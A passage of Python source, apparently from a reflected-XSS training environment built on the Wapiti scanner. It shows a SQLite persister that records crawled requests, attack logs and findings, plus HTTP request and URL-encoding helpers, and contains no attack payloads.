 36 |     HOME_DIR = os.getenv("HOME") or os.getenv("USERPROFILE")
 37 |     BASE_DIR = os.path.join(HOME_DIR, ".wapiti")
 38 |     CRAWLER_DATA_DIR = os.path.join(BASE_DIR, CRAWLER_DATA_DIR_NAME)
 39 | 
 40 |     ROOT_URL = "rootURL"
 41 |     TO_BROWSE = "toBrowse"
 42 |     BROWSED = "browsed"
 43 |     RESOURCE = "resource"
 44 |     METHOD = "method"
 45 |     PATH = "path"
 46 |     INPUT = "input"
 47 |     INPUT_NAME = "name"
 48 |     INPUT_VALUE = "value"
 49 |     HEADERS = "headers"
 50 |     HEADER = "header"
 51 |     HEADER_NAME = "name"
 52 |     HEADER_VALUE = "value"
 53 |     ENCODING = "encoding"
 54 |     ENCTYPE = "enctype"
 55 |     REFERER = "referer"
 56 |     GET_PARAMS = "get_params"
 57 |     POST_PARAMS = "post_params"
 58 |     FILE_PARAMS = "file_params"
 59 |     DEPTH = "depth"
 60 | 
 61 |     def __init__(self, output_file: str):
 62 |         # toBrowse can contain GET and POST resources
 63 |         self.to_browse = []
 64 |         # browsed contains only GET resources
 65 |         self.browsed_links = []
 66 |         # forms contains only POST resources
 67 |         self.browsed_forms = []
 68 |         self.uploads = []
 69 |         self.headers = {}
 70 |         self.root_url = ""
 71 | 
 72 |         self.tag = ""
 73 |         self.array = None
 74 | 
 75 |         self.method = ""
 76 |         self.path = ""
 77 |         self.encoding = ""
 78 |         self.enctype = "application/x-www-form-urlencoded"
 79 |         self.referer = ""
 80 |         self.get_params = []
 81 |         self.post_params = []
 82 |         self.file_params = []
 83 |         self.depth = 0
 84 |         self.output_file = output_file
 85 | 
 86 |         must_create = not os.path.exists(self.output_file)
 87 |         self._conn = sqlite3.connect(self.output_file)
 88 | 
 89 |         cursor = self._conn.cursor()
 90 |         
 91 | 
 92 |         if True: #must_create:
 93 |             try:
 94 |                 cursor.execute("""CREATE TABLE scan_infos (key TEXT, value TEXT)""")
 95 |             except:
 96 |                 pass
 97 |             try:
 98 |                 cursor.execute(
 99 |                     """CREATE TABLE paths (
100 |                         path_id INTEGER PRIMARY KEY,
101 |                         path TEXT,
102 |                         method TEXT,
103 |                         enctype TEXT,
104 |                         depth INTEGER,
105 |                         encoding TEXT,
106 |                         http_status INTEGER,
107 |                         headers TEXT,
108 |                         referer TEXT,
109 |                         evil INTEGER
110 |                     )"""
111 |                 )
112 |             except:
113 |                 pass
114 |             try:
115 |                 cursor.execute(
116 |                     """CREATE TABLE params (
117 |                         path_id INTEGER,
118 |                         type TEXT,
119 |                         param_order INTEGER,
120 |                         name TEXT,
121 |                         value1 TEXT,
122 |                         value2 TEXT,
123 |                         meta TEXT,
124 |                         FOREIGN KEY(path_id) REFERENCES paths(path_id)
125 |                     )"""
126 |                 )
127 |             except:
128 |                 pass
129 |             try: 
130 |                 cursor.execute(
131 |                     """CREATE TABLE attack_log (path_id INTEGER, module_name TEXT)"""
132 |                 )
133 |             except:
134 |                 pass
135 |             try: 
136 |                 cursor.execute(
137 |                     """CREATE TABLE payloads (
138 |                         evil_path INTEGER PRIMARY KEY,
139 |                         original_path INTEGER,
140 |                         category TEXT,
141 |                         level INTEGER,
142 |                         parameter TEXT,
143 |                         info TEXT,
144 |                         type TEXT
145 |                     )"""
146 |                 )
147 |             except:
148 |                 pass
149 | 
150 |             self._conn.commit()
151 | 
152 |     def close(self):
153 |         self._conn.close()
154 | 
155 |     def set_root_url(self, root_url):
156 |         cursor = self._conn.cursor()
157 |         cursor.execute("""INSERT INTO scan_infos VALUES (?, ?)""", ("root_url", root_url))
158 |         self._conn.commit()
159 |         self.root_url = root_url
160 | 
161 |     def get_root_url(self):
162 |         cursor = self._conn.cursor()
163 |         cursor.execute("SELECT value FROM scan_infos WHERE key = 'root_url'")
164 |         return cursor.fetchone()[0]
165 | 
166 |     def set_to_browse(self, to_browse):
167 |         self._set_paths(to_browse)
168 | 
169 |     def get_to_browse(self):
170 |         yield from self._get_paths(method=None, crawled=False)
171 | 
172 |     def _set_paths(self, paths):
173 |         cursor = self._conn.cursor()
174 |         for http_resource in paths:
175 |             cursor.execute(
176 |                 """INSERT INTO paths VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
177 |                 (
178 |                     None,
179 |                     http_resource.path,
180 |                     http_resource.method,
181 |                     http_resource.enctype,
182 |                     http_resource.link_depth,
183 |                     http_resource.encoding,
184 |                     http_resource.status if isinstance(http_resource.status, int) else None,
185 |                     None if http_resource.headers is None else json.dumps(dict(http_resource.headers)),
186 |                     http_resource.referer,
187 |                     0
188 |                 )
189 |             )
190 |             
191 |             path_id = cursor.lastrowid
192 |             for i, (k, v) in enumerate(http_resource.get_params):
193 |                 cursor.execute(
194 |                     """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
195 |                     (path_id, "GET", i, k, v, None, None)
196 |                 )
197 | 
198 |             post_params = http_resource.post_params
199 |             if isinstance(post_params, list):
200 |                 for i, (k, v) in enumerate(http_resource.post_params):
201 |                     cursor.execute(
202 |                         """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
203 |                         (path_id, "POST", i, k, v, None, None)
204 |                     )
205 |             elif len(post_params):
206 |                 cursor.execute(
207 |                     """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
208 |                     (path_id, "POST", 0, "__RAW__", post_params, None, None)
209 |                 )
210 | 
211 |             for i, (k, v) in enumerate(http_resource.file_params):
212 |                 # v kill be something like ['pix.gif', 'GIF89a', 'image/gif']
213 |                 # just keep the file name
214 |                 if len(v) == 3:
215 |                     meta = v[2]
216 |                 else:
217 |                     meta = None
218 |                 cursor.execute(
219 |                     """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
220 |                     (path_id, "FILE", i, k, v[0], v[1], meta)
221 |                 )
222 |         self._conn.commit()
223 | 
224 |     def add_request(self, link):
225 |         self._set_paths([link])
226 | 
227 |     def _get_paths(self, path=None, method=None, crawled: bool = True, attack_module: str = "", evil: bool = False):
228 |         cursor = self._conn.cursor()
229 | 
230 |         conditions = ["evil = ?"]
231 |         args = [int(evil)]
232 | 
233 |         if path and isinstance(path, str):
234 |             conditions.append("path = ?")
235 |             args.append(path)
236 | 
237 |         if method in ("GET", "POST"):
238 |             conditions.append("method = ?")
239 |             args.append(method)
240 | 
241 |         if crawled:
242 |             conditions.append("headers IS NOT NULL")
243 | 
244 |         conditions = " AND ".join(conditions)
245 |         conditions = "WHERE " + conditions
246 | 
247 |         cursor.execute("SELECT * FROM paths {} ORDER BY path".format(conditions), args)
248 | 
249 |         for row in cursor.fetchall():
250 |             path_id = row[0]
251 | 
252 |             if attack_module:
253 |                 # Exclude requests matching the attack module, we want requests that aren't attacked yet
254 |                 cursor.execute(
255 |                     "SELECT * FROM attack_log WHERE path_id = ? AND module_name = ? LIMIT 1",
256 |                     (path_id, attack_module)
257 |                 )
258 | 
259 |                 if cursor.fetchone():
260 |                     continue
261 | 
262 |             get_params = []
263 |             post_params = []
264 |             file_params = []
265 | 
266 |             for param_row in cursor.execute(
267 |                     (
268 |                             "SELECT type, name, value1, value2, meta "
269 |                             "FROM params "
270 |                             "WHERE path_id = ? "
271 |                             "ORDER BY type, param_order"
272 |                     ),
273 |                     (path_id, )
274 |             ):
275 |                 name = param_row[1]
276 |                 value1 = param_row[2]
277 | 
278 |                 if param_row[0] == "GET":
279 |                     get_params.append([name, value1])
280 |                 elif param_row[0] == "POST":
281 |                     if name == "__RAW__" and not post_params:
282 |                         # First POST parameter is __RAW__, it should mean that we have raw content
283 |                         post_params = value1
284 |                     elif isinstance(post_params, list):
285 |                         post_params.append([name, value1])
286 |                 elif param_row[0] == "FILE":
287 |                     if param_row[4]:
288 |                         file_params.append([name, [value1, param_row[3], param_row[4]]])
289 |                     else:
290 |                         file_params.append([name, [value1, param_row[3]]])
291 |                 else:
292 |                     raise ValueError("Unknown param type {}".format(param_row[0]))
293 | 
294 |             http_res = web.Request(
295 |                 row[1],
296 |                 method=row[2],
297 |                 encoding=row[5],
298 |                 enctype=row[3],
299 |                 referer=row[8],
300 |                 get_params=get_params,
301 |                 post_params=post_params,
302 |                 file_params=file_params
303 |             )
304 | 
305 |             if row[6]:
306 |                 http_res.status = row[6]
307 | 
308 |             if row[7]:
309 |                 http_res.set_headers(json.loads(row[7]))
310 | 
311 |             http_res.link_depth = row[4]
312 |             http_res.path_id = path_id
313 | 
314 |             yield http_res
315 | 
316 |     def get_links(self, path=None, attack_module: str = ""):
317 |         yield from self._get_paths(path=path, method="GET", crawled=True, attack_module=attack_module)
318 | 
319 |     def get_forms(self, attack_module: str = ""):
320 |         yield from self._get_paths(method="POST", crawled=True, attack_module=attack_module)
321 | 
322 |     def count_paths(self) -> int:
323 |         cursor = self._conn.cursor()
324 |         cursor.execute("SELECT COUNT(path_id) from paths WHERE evil = 0")
325 |         return cursor.fetchone()[0]
326 | 
327 |     def set_attacked(self, path_id, module_name):
328 |         cursor = self._conn.cursor()
329 |         cursor.execute("INSERT INTO attack_log VALUES (?, ?)", (path_id, module_name))
330 |         self._conn.commit()
331 | 
332 |     def count_attacked(self, module_name) -> int:
333 |         cursor = self._conn.cursor()
334 |         cursor.execute("SELECT COUNT(path_id) from attack_log WHERE module_name = ?", (module_name, ))
335 |         return cursor.fetchone()[0]
336 | 
337 |     def has_scan_finished(self):
338 |         cursor = self._conn.cursor()
339 |         cursor.execute("SELECT path_id FROM paths WHERE headers IS NULL LIMIT 1")
340 |         if cursor.fetchone():
341 |             return False
342 |         return True
343 | 
344 |     def has_scan_started(self) -> bool:
345 |         cursor = self._conn.cursor()
346 |         cursor.execute("SELECT path_id FROM paths LIMIT 1")
347 |         if cursor.fetchone():
348 |             return True
349 |         return False
350 | 
351 |     def have_attacks_started(self) -> bool:
352 |         cursor = self._conn.cursor()
353 |         cursor.execute("SELECT path_id FROM attack_log LIMIT 1")
354 |         if cursor.fetchone():
355 |             return True
356 |         return False
357 | 
358 |     def add_payload(
359 |             self, request_id: int, payload_type: str, category=None, level=0, request=None, parameter="", info=""):
360 |         cursor = self._conn.cursor()
361 | 
362 |         cursor.execute(
363 |             """INSERT INTO paths VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
364 |             (
365 |                 None,
366 |                 request.path,
367 |                 request.method,
368 |                 request.enctype,
369 |                 request.link_depth,
370 |                 request.encoding,
371 |                 request.status if isinstance(request.status, int) else None,
372 |                 None if request.headers is None else json.dumps(dict(request.headers)),
373 |                 request.referer,
374 |                 1
375 |             )
376 |         )
377 | 
378 |         # path_id is the ID of the evil path
379 |         path_id = cursor.lastrowid
380 |         for i, (k, v) in enumerate(request.get_params):
381 |             cursor.execute(
382 |                 """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
383 |                 (path_id, "GET", i, k, v, None, None)
384 |             )
385 | 
386 |         post_params = request.post_params
387 |         if isinstance(post_params, list):
388 |             for i, (k, v) in enumerate(request.post_params):
389 |                 cursor.execute(
390 |                     """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
391 |                     (path_id, "POST", i, k, v, None, None)
392 |                 )
393 |         elif len(post_params):
394 |             cursor.execute(
395 |                 """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
396 |                 (path_id, "POST", 0, "__RAW__", post_params, None, None)
397 |             )
398 | 
399 |         for i, (k, v) in enumerate(request.file_params):
400 |             if len(v) == 3:
401 |                 meta = v[2]
402 |             else:
403 |                 meta = None
404 | 
405 |             cursor.execute(
406 |                 """INSERT INTO params VALUES (?, ?, ?, ?, ?, ?, ?)""",
407 |                 (path_id, "FILE", i, k, v[0], v[1], meta)
408 |             )
409 | 
410 |         # request_id is the ID of the original (legit) request
411 |         cursor.execute(
412 |             "INSERT INTO payloads VALUES (?, ?, ?, ?, ?, ?, ?)",
413 |             (path_id, request_id, category, level, parameter, info, payload_type)
414 |         )
415 |         self._conn.commit()
416 | 
417 |     def add_anomaly(self, request_id: int = -1, category=None, level=0, request=None, parameter="", info=""):
418 |         self.add_payload(
419 |             request_id,
420 |             "anomaly",
421 |             category,
422 |             level,
423 |             request,
424 |             parameter,
425 |             info
426 |         )
427 | 
428 |     def add_vulnerability(self, request_id: int = -1, category=None, level=0, request=None, parameter="", info=""):
429 |         self.add_payload(
430 |             request_id,
431 |             "vulnerability",
432 |             category,
433 |             level,
434 |             request,
435 |             parameter,
436 |             info
437 |         )
438 | 
439 |     def get_path_by_id(self, path_id):
440 |         cursor = self._conn.cursor()
441 | 
442 |         cursor.execute("SELECT * FROM paths WHERE path_id = ? LIMIT 1", (path_id, ))
443 | 
444 |         row = cursor.fetchone()
445 |         if not row:
446 |             return None
447 | 
448 |         get_params = []
449 |         post_params = []
450 |         file_params = []
451 | 
452 |         for param_row in cursor.execute(
453 |                 (
454 |                         "SELECT type, name, value1, value2, meta "
455 |                         "FROM params "
456 |                         "WHERE path_id = ? "
457 |                         "ORDER BY type, param_order"
458 |                 ),
459 |                 (path_id, )
460 |         ):
461 |             name = param_row[1]
462 |             value1 = param_row[2]
463 | 
464 |             if param_row[0] == "GET":
465 |                 get_params.append([name, value1])
466 |             elif param_row[0] == "POST":
467 |                 if name == "__RAW__" and not post_params:
468 |                     # First POST parameter is __RAW__, it should mean that we have raw content
469 |                     post_params = value1
470 |                 elif isinstance(post_params, list):
471 |                     post_params.append([name, value1])
472 |             elif param_row[0] == "FILE":
473 |                 if param_row[4]:
474 |                     file_params.append([name, [value1, param_row[3], param_row[4]]])
475 |                 else:
476 |                     file_params.append([name, [value1, param_row[3]]])
477 |             else:
478 |                 raise ValueError("Unknown param type {}".format(param_row[0]))
479 | 
480 |         request = web.Request(
481 |             row[1],
482 |             method=row[2],
483 |             encoding=row[5],
484 |             enctype=row[3],
485 |             referer=row[8],
486 |             get_params=get_params,
487 |             post_params=post_params,
488 |             file_params=file_params
489 |         )
490 | 
491 |         if row[6]:
492 |             request.status = row[6]
493 | 
494 |         if row[7]:
495 |             request.set_headers(json.loads(row[7]))
496 | 
497 |         request.link_depth = row[4]
498 |         request.path_id = path_id
499 | 
500 |         return request
501 | 
502 |     def get_payloads(self):
503 |         cursor = self._conn.cursor()
504 |         cursor.execute("SELECT * FROM payloads")
505 | 
506 |         for row in cursor.fetchall():
507 |             evil_id, original_id, category, level, parameter, info, payload_type = row
508 | 
509 |             evil_request = self.get_path_by_id(evil_id)
510 |             original_request = self.get_path_by_id(original_id)
511 | 
512 |             yield Payload(evil_request, original_request, category, level, parameter, info, payload_type)
513 | 
514 |     def flush_session(self):
515 |         self.flush_attacks()
516 |         cursor = self._conn.cursor()
517 |         cursor.execute("DELETE FROM paths")
518 |         cursor.execute("DELETE FROM params")
519 |         self._conn.commit()
520 | 
521 |     def flush_attacks(self):
522 |         cursor = self._conn.cursor()
523 |         cursor.execute("DELETE FROM attack_log")  # which module was launched on which URL
524 |         cursor.execute("DELETE FROM payloads")  # informations on vulnerabilities and anomalies
525 |         cursor.execute("DELETE FROM paths WHERE evil = 1")  # Evil requests
526 |         # Remove params tied to deleted requests
527 |         cursor.execute("DELETE FROM params WHERE path_id NOT IN (SELECT path_id FROM paths)")
528 |         self._conn.commit()
529 | 
530 |     def delete_path_by_id(self, path_id):
531 |         cursor = self._conn.cursor()
532 |         # First remove all references to that path then remove it
533 |         cursor.execute("DELETE FROM payloads WHERE evil_path = ? OR original_path = ?", (path_id, path_id))
534 |         cursor.execute("DELETE FROM attack_log WHERE path_id = ?", (path_id, ))
535 |         cursor.execute("DELETE FROM params WHERE path_id = ?", (path_id, ))
536 |         cursor.execute("DELETE FROM paths WHERE path_id = ?", (path_id, ))
537 |         self._conn.commit()
538 | 
539 |     def get_big_requests_ids(self, params_count: int) -> list:
540 |         cursor = self._conn.cursor()
541 |         cursor.execute(
542 |             "SELECT path_id, count(*) as params_count FROM params GROUP BY path_id HAVING params_count > ?",
543 |             (params_count, )
544 |         )
545 | 
546 |         path_ids = set()
547 |         for row in cursor.fetchall():
548 |             path_id, count = row
549 |             path_ids.add(path_id)
550 | 
551 |         return list(path_ids)
552 | 
553 |     def remove_big_requests(self, params_count: int) -> int:
554 |         path_ids = self.get_big_requests_ids(params_count)
555 | 
556 |         for path_id in path_ids:
557 |             self.delete_path_by_id(path_id)
558 |         return len(path_ids)
559 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/attack_module/net/web.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | # This file is part of the Wapiti project (http://wapiti.sourceforge.net)
  4 | # Copyright (C) 2008-2019 Nicolas Surribas
  5 | #
  6 | # This program is free software; you can redistribute it and/or modify
  7 | # it under the terms of the GNU General Public License as published by
  8 | # the Free Software Foundation; either version 2 of the License, or
  9 | # (at your option) any later version.
 10 | #
 11 | # This program is distributed in the hope that it will be useful,
 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 14 | # GNU General Public License for more details.
 15 | #
 16 | # You should have received a copy of the GNU General Public License
 17 | # along with this program; if not, write to the Free Software
 18 | # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 19 | from urllib.parse import urlparse, quote_plus, unquote, quote
 20 | import posixpath
 21 | from copy import deepcopy
 22 | import sys
 23 | 
 24 | 
 25 | def urlencode(query, safe='', encoding=None, errors=None, quote_via=quote_plus):
 26 |     """Encode a dict or sequence of two-element tuples into a URL query string.
 27 | 
 28 |     If the query arg is a sequence of two-element tuples, the order of the
 29 |     parameters in the output will match the order of parameters in the
 30 |     input.
 31 |     The components of a query arg may each be either a string or a bytes type.
 32 |     The safe, encoding, and errors parameters are passed down to the function
 33 |     specified by quote_via (encoding and errors only if a component is a str).
 34 |     """
 35 | 
 36 |     if hasattr(query, "items"):
 37 |         query = query.items()
 38 |     else:
 39 |         # It's a bother at times that strings and string-like objects are
 40 |         # sequences.
 41 |         try:
 42 |             # non-sequence items should not work with len()
 43 |             # non-empty strings will fail this
 44 |             if len(query) and not isinstance(query[0], tuple):
 45 |                 raise TypeError
 46 |             # Zero-length sequences of all types will get here and succeed,
 47 |             # but that's a minor nit.  Since the original implementation
 48 |             # allowed empty dicts that type of behavior probably should be
 49 |             # preserved for consistency
 50 |         except TypeError:
 51 |             ty, va, tb = sys.exc_info()
 52 |             raise TypeError("not a valid non-string sequence "
 53 |                             "or mapping object").with_traceback(tb)
 54 | 
 55 |     key_value_pair = []
 56 | 
 57 |     for k, v in query:
 58 |         if isinstance(k, bytes):
 59 |             k = quote_via(k, safe)
 60 |         else:
 61 |             k = quote_via(str(k), safe, encoding, errors)
 62 | 
 63 |         if v is None:
 64 |             key_value_pair.append(k)
 65 |         elif isinstance(v, bytes):
 66 |             v = quote_via(v, safe)
 67 |             key_value_pair.append(k + '=' + v)
 68 |         elif isinstance(v, str):
 69 |             v = quote_via(v, safe, encoding, errors)
 70 |             key_value_pair.append(k + '=' + v)
 71 |         else:
 72 |             try:
 73 |                 # Is this a sufficient test for sequence-ness?
 74 |                 x = len(v)
 75 |             except TypeError:
 76 |                 # not a sequence
 77 |                 v = quote_via(str(v), safe, encoding, errors)
 78 |                 key_value_pair.append(k + '=' + v)
 79 |             else:
 80 |                 # loop over the sequence
 81 |                 for elt in v:
 82 |                     if isinstance(elt, bytes):
 83 |                         elt = quote_via(elt, safe)
 84 |                     else:
 85 |                         elt = quote_via(str(elt), safe, encoding, errors)
 86 |                     key_value_pair.append(k + '=' + elt)
 87 |     return '&'.join(key_value_pair)
 88 | 
 89 | 
 90 | def parse_qsl(qs, strict_parsing=False, encoding='utf-8', errors='replace', max_num_fields=None):
 91 |     """Parse a query given as a string argument.
 92 |         Arguments:
 93 |         qs: percent-encoded query string to be parsed
 94 |         strict_parsing: flag indicating what to do with parsing errors. If
 95 |             false (the default), errors are silently ignored. If true,
 96 |             errors raise a ValueError exception.
 97 |         encoding and errors: specify how to decode percent-encoded sequences
 98 |             into Unicode characters, as accepted by the bytes.decode() method.
 99 |         max_num_fields: int. If set, then throws a ValueError
100 |             if there are more than n fields read by parse_qsl().
101 |         Returns a list, as G-d intended.
102 |     """
103 |     # If max_num_fields is defined then check that the number of fields
104 |     # is less than max_num_fields. This prevents a memory exhaustion DOS
105 |     # attack via post bodies with many fields.
106 |     if max_num_fields is not None:
107 |         num_fields = 1 + qs.count('&') + qs.count(';')
108 |         if max_num_fields < num_fields:
109 |             raise ValueError('Max number of fields exceeded')
110 | 
111 |     pairs = [s2 for s1 in qs.split('&') for s2 in s1.split(';')]
112 |     r = []
113 | 
114 |     for name_value in pairs:
115 |         if not name_value and not strict_parsing:
116 |             continue
117 | 
118 |         nv = name_value.split('=', 1)
119 |         if len(nv) != 2:
120 |             if strict_parsing:
121 |                 raise ValueError("bad query field: %r" % (name_value,))
122 |             # Handle case of a control-name with no equal sign
123 |             nv.append(None)
124 | 
125 |         name = nv[0].replace('+', ' ')
126 |         name = unquote(name, encoding=encoding, errors=errors)
127 | 
128 |         if nv[1]:
129 |             value = nv[1].replace('+', ' ')
130 |             value = unquote(value, encoding=encoding, errors=errors)
131 |         else:
132 |             value = nv[1]
133 | 
134 |         r.append((name, value))
135 |     return r
136 | 
137 | 
138 | def shell_escape(s: str):
139 |     s = s.replace('\\', '\\\\')
140 |     s = s.replace('"', '\\"')
141 |     s = s.replace('$', '\\$')
142 |     s = s.replace('!', '\\!')
143 |     s = s.replace('`', '\\`')
144 |     return s
145 | 
146 | 
147 | class Request:
148 |     def __init__(
149 |             self, path: str, method: str = "",
150 |             get_params: list = None, post_params: list = None, file_params: list = None,
151 |             encoding: str = "UTF-8", enctype: str = "",
152 |             referer: str = "", link_depth: int = 0):
153 |         """Create a new Request object.
154 | 
155 |         Takes the following arguments:
156 |             path : The path of the HTTP resource on the server. It can contain a query string.
157 |             get_params : A list of key/value parameters (each one is a list of two string).
158 |                                       Each string should already be urlencoded in the good encoding format.
159 |             post_params : Same structure as above but specify the parameters sent in the HTTP body.
160 |             file_params : Same as above expect the values are a tuple (filename, file_content).
161 |             encoding : A string specifying the encoding used to send data to this URL.
162 |                                   Don't mistake it with the encoding of the webpage pointed out by the Request.
163 |             referer : The URL from which the current Request was found.
164 |         """
165 |         self._resource_path = path.split("#")[0]
166 | 
167 |         # Most of the members of a Request object are immutable so we compute
168 |         # the data only one time (when asked for) and we keep it in memory for less
169 |         # calculations in those "cached" vars.
170 |         self._cached_url = ""
171 |         self._cached_get_keys = None
172 |         self._cached_post_keys = None
173 |         self._cached_file_keys = None
174 |         self._cached_encoded_params = None
175 |         self._cached_encoded_data = None
176 |         self._cached_encoded_files = None
177 |         self._cached_hash = None
178 | 
179 |         self._cached_hash_params = None
180 |         self._status = None
181 | 
182 |         if not method:
183 |             # For lazy
184 |             if post_params or file_params:
185 |                 self._method = "POST"
186 |             else:
187 |                 self._method = "GET"
188 |         else:
189 |             self._method = method
190 | 
191 |         self._enctype = ""
192 |         if self._method == "POST":
193 |             if enctype:
194 |                 self._enctype = enctype.lower().strip()
195 |             else:
196 |                 if file_params:
197 |                     self._enctype = "multipart/form-data"
198 |                 else:
199 |                     self._enctype = "application/x-www-form-urlencoded"
200 | 
201 |         # same structure as _get_params, see below
202 |         if not post_params:
203 |             # None or empty string or empty list
204 |             self._post_params = []
205 |         else:
206 |             if isinstance(post_params, list):
207 |                 # Non empty list
208 |                 self._post_params = deepcopy(post_params)
209 |             elif isinstance(post_params, str):
210 |                 if "urlencoded" in self.enctype or self.is_multipart:
211 |                     # special case of multipart is dealt when sending request
212 |                     self._post_params = []
213 |                     if len(post_params):
214 |                         for kv in post_params.split("&"):
215 |                             if kv.find("=") > 0:
216 |                                 self._post_params.append(kv.split("=", 1))
217 |                             else:
218 |                                 # ?param without value
219 |                                 self._post_params.append([kv, None])
220 |                 else:
221 |                     # must be something like application/json or text/xml
222 |                     self._post_params = post_params
223 | 
224 |         # eg: files = [['file_field', ('file_name', 'file_content')]]
225 |         if not file_params:
226 |             self._file_params = []
227 |         else:
228 |             if isinstance(file_params, list):
229 |                 self._file_params = deepcopy(file_params)
230 |             else:
231 |                 self._file_params = file_params
232 | 
233 |         # eg: get = [['id', '25'], ['color', 'green']]
234 |         if not get_params:
235 |             self._get_params = []
236 |             if "?" in self._resource_path:
237 |                 query_string = urlparse(self._resource_path).query
238 |                 self._get_params = [[k, v] for k, v in parse_qsl(query_string)]
239 |                 self._resource_path = self._resource_path.split("?")[0]
240 |         else:
241 |             if isinstance(get_params, list):
242 |                 self._resource_path = self._resource_path.split("?")[0]
243 |                 self._get_params = deepcopy(get_params)
244 |             else:
245 |                 self._get_params = get_params
246 | 
247 |         self._encoding = encoding
248 |         self._referer = referer
249 |         self._link_depth = link_depth
250 |         parsed = urlparse(self._resource_path)
251 |         self._file_path = parsed.path
252 |         self._hostname = parsed.netloc
253 |         self._port = 80
254 |         if parsed.port is not None:
255 |             self._port = parsed.port
256 |         elif parsed.scheme == "https":
257 |             self._port = 443
258 |         self._headers = None
259 |         self._start_time = None
260 |         self._duration = -1
261 |         self._size = 0
262 |         self._path_id = None
263 | 
264 |     # TODO: hashable objects should be read-only. Currently the Mutator get a deepcopy of params to play with but
265 |     # having read-only params in Request class would be more Pythonic. More work on the Mutator in a future version ?
266 |     def __hash__(self):
267 |         if self._cached_hash is None:
268 |             get_kv = tuple([tuple(param) for param in self._get_params])
269 |             if isinstance(self._post_params, list):
270 |                 post_kv = tuple([tuple(param) for param in self._post_params])
271 |             else:
272 |                 post_kv = self._enctype + str(len(self._post_params))
273 |             file_kv = tuple([tuple([param[0], param[1][0]]) for param in self._file_params])
274 | 
275 |             self._cached_hash = hash((self._method, self._resource_path, get_kv, post_kv, file_kv))
276 |         return self._cached_hash
277 | 
278 |     def __eq__(self, other):
279 |         if not isinstance(other, Request):
280 |             return NotImplemented
281 | 
282 |         if self._method != other.method:
283 |             return False
284 | 
285 |         if self._resource_path != other.path:
286 |             return False
287 | 
288 |         return hash(self) == hash(other)
289 | 
290 |     def __lt__(self, other):
291 |         if not isinstance(other, Request):
292 |             return NotImplemented
293 |         if self.url < other.url:
294 |             return True
295 |         else:
296 |             if self.url == other.url:
297 |                 return self.encoded_data < other.encoded_data
298 |             return False
299 | 
300 |     def __le__(self, other):
301 |         if not isinstance(other, Request):
302 |             return NotImplemented
303 |         if self.url < other.url:
304 |             return True
305 |         elif self.url == other.url:
306 |             return self.encoded_data <= other.encoded_data
307 |         return False
308 | 
309 |     def __ne__(self, other):
310 |         if not isinstance(other, Request):
311 |             return NotImplemented
312 | 
313 |         if self.method != other.method:
314 |             return True
315 | 
316 |         if self._resource_path != other.path:
317 |             return True
318 | 
319 |         return hash(self) != hash(other)
320 | 
321 |     def __gt__(self, other):
322 |         if not isinstance(other, Request):
323 |             return NotImplemented
324 |         if self.url > other.url:
325 |             return True
326 |         elif self.url == other.url:
327 |             return self.encoded_data > other.encoded_data
328 |         return False
329 | 
330 |     def __ge__(self, other):
331 |         if not isinstance(other, Request):
332 |             return NotImplemented
333 |         if self.url > other.url:
334 |             return True
335 |         elif self.url == other.url:
336 |             return self.encoded_data >= other.encoded_data
337 |         return False
338 | 
339 |     def __len__(self):
340 |         if isinstance(self._post_params, list):
341 |             return len(self.get_params) + len(self._post_params) + len(self._file_params)
342 |         else:
343 |             return len(self.get_params) + len(self._file_params)
344 | 
345 |     @staticmethod
346 |     def _encoded_keys(params):
347 |         return "&".join([quote(key, safe='%') for key in sorted(kv[0] for kv in params)])
348 | 
349 |     def __repr__(self):
350 |         if self._get_params:
351 |             buff = "{0} {1} ({2})".format(self._method, self.url, self._link_depth)
352 |         else:
353 |             buff = "{0} {1} ({2})".format(self._method, self._resource_path, self._link_depth)
354 | 
355 |         if self._post_params:
356 |             buff += "\n\tdata: {}".format(self.encoded_data.replace("\n", "\n\t"))
357 |         if self._file_params:
358 |             buff += "\n\tfiles: {}".format(self.encoded_files)
359 |         return buff
360 | 
361 |     def http_repr(self, left_margin="    "):
362 |         rel_url = self.url.split('/', 3)[3]
363 |         http_string = "{3}{0} /{1} HTTP/1.1\n{3}Host: {2}\n".format(
364 |             self._method,
365 |             rel_url,
366 |             self._hostname,
367 |             left_margin
368 |         )
369 | 
370 |         if self._referer:
371 |             http_string += "{}Referer: {}\n".format(left_margin, self._referer)
372 | 
373 |         if self._file_params:
374 |             boundary = "------------------------boundarystring"
375 |             http_string += "{}Content-Type: multipart/form-data; boundary={}\n\n".format(left_margin, boundary)
376 |             for field_name, field_value in self._post_params:
377 |                 http_string += (
378 |                     "{3}{0}\n{3}Content-Disposition: form-data; "
379 |                     "name=\"{1}\"\n\n{3}{2}\n"
380 |                 ).format(boundary, field_name, field_value, left_margin)
381 |             for field_name, field_value in self._file_params:
382 |                 http_string += (
383 |                     "{3}{0}\n{3}Content-Disposition: form-data; name=\"{1}\"; filename=\"{2}\"\n\n"
384 |                     "{3}{4}\n"
385 |                 ).format(
386 |                     boundary,
387 |                     field_name,
388 |                     field_value[0],
389 |                     left_margin,
390 |                     field_value[1].replace("\n", "\n" + left_margin).strip()
391 |                 )
392 |             http_string += "{0}{1}--\n".format(left_margin, boundary)
393 |         elif self._post_params:
394 |             if "urlencoded" in self.enctype:
395 |                 http_string += "{}Content-Type: application/x-www-form-urlencoded\n".format(left_margin)
396 |                 http_string += "\n{}{}".format(left_margin, self.encoded_data)
397 |             else:
398 |                 http_string += "{}Content-Type: {}\n".format(left_margin, self.enctype)
399 |                 http_string += "\n{}{}".format(
400 |                     left_margin,
401 |                     self.encoded_data.replace("\n", "\n" + left_margin).strip()
402 |                 )
403 | 
404 |         return http_string.rstrip()
405 | 
406 |     @property
